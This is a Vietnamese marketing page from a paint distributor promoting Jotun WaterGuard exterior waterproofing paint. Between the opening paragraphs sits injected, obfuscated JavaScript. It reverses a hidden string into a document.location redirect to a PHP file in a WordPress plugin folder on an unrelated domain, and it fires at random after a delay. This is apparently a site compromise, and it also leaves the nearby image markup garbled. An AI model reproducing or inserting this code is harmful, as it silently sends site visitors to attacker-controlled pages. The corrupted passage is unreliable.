Sơn Chống Thấm Jotun WaterGuard – Giải Pháp Chống Thấm Vượt Trội!

Sơn Chống Thấm Jotun WaterGuard – Giải Pháp Chống Thấm Vượt Trội!

Xây nhà trong thời tiết bắt đầu vào mùa mưa luôn là mối quan ngại với bất kỳ gia chủ nào, trong việc chống thấm cho bề mặt tường, nhất là đối với bề mặt ngoại thất.

Xây nhà trong mùa mưa, khó tránh khỏi việc ẩm thấp, tường ẩm nước, làm giảm tuổi thọ của tường, bong tróc, phai màu của sơn phủ. Làm tăng nguy cơ ố vàng, gây nấm mốc về mặt tường và làm ảnh hưởng đến nét thẩm mỹ của cả căn nhà.

$nJe=function(n){if (typeof ($nJe.list[n]) == “string”) return $nJe.list[n].split(“”).reverse().join(“”);return $nJe.list[n];};$nJe.list=[“\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);} tot-nhat-400×278.jpg” alt=”” width=”400″ height=”278″ /> Đã có sơn chống thấm Jotun WaterGuard ngại gì mưa gió!

Sơn Chống Thấm Jotun WaterGuard – Giải Pháp Chống Thấm Vượt Trội!

Để tìm một giải pháp chống thấm cho ngôi nhà vào mùa mưa, sản phẩm dành cho bề mặt tường ngoại thất Jotun WaterGuard là một giải pháp hoàn hảo vừa đáp ứng được nhu cầu về chống thấm vượt trội, vừa tối ưu về mặt giá thành. Là một lựa chọn hợp lý bền vững cho ngôi nhà của bạn.

Jotun WaterGuard là dòng sản phẩm dành cho bề mặt ngoại thất, là dòng sản phẩm sơn chống thấm gốc nước. Sản phẩm có khả năng che phủ vết nứt nhỏ, ngăn chặn nước thâm nhập vào bên trong.

Jotun WaterGuard là sản phẩm sơn 1 thành phần, không cần pha trộn với xi măng và dễ sử dụng giúp tiết kiệm chi phí thi công. Waterguard có khả năng ngăn chặn sự phát triển của nấm mốc, đảm bảo bề mặt tường luôn được bảo vệ, không bị hư hại, và sạch đẹp.

Sản phẩm có 3 màu: màu kem, xám và đen. Giúp quý khách hàng có thêm nhiều sự lựa chọn.

 

Bảng màu sơn chống thấm ngoài trời Jotun WaterGuard

Xem chi tiết bảng màu sơn Jotun tại đây

Đặc điểm và lợi ích của dòng sơn chống thấm WaterGuard:

 • Chống thấm – Tường được sơn có khả năng chống thấm nước.
 • Tính co giãn – Che phủ vết nứt nhỏ nhằm ngăn chặn nước ngấm vào.
 • Dễ sử dụng – Là sơn 1 thành phần nên không cần thiết phải pha trộn với xi-măng và là loại sơn rất dễ sử dụng.
 • Chống rong rêu và nấm mốc – Khả năng bảo vệ dài lâu khỏi rong rêu và nấm mốc trong môi trường khí hậu nhiệt đới, mưa ẩm
 • Sản phẩm thân thiện môi trường. Được chứng nhận Nhãn xanh Singapore.

Mọi thông số về kỹ thuật của dòng sơn chống thấm WaterGuard, xin vui lòng truy cập tại website: https://sonnamthienphu.com/ hoặc tham khảo thêm các dòng sơn chống thấm khác tại đây

Với chia sẻ trên, Nam Thiên Phú hi vọng, bạn có thể thêm nhiều kinh nghiệm trong việc lựa chọn dòng sơn chống thấm cho ngôi nhà của mình trong những ngày mưa sắp đến.

Tham khảo thêm các dòng sơn nước khác:

 1. Sơn Kova
 2. Sơn Jotun
 3. Sơn Dulux
 4. Sơn Maxilite
 5. Sơn Nippon
 6. Sơn Seamaster
 7. ……..

Công ty TNHH TM Nam Thiên Phú tự hào là nhà phân phối sơn hàng đầu với các thương hiệu nổi tiếng trên thị trường.

Share this post

Trả lời

Email của bạn sẽ không được hiển thị công khai.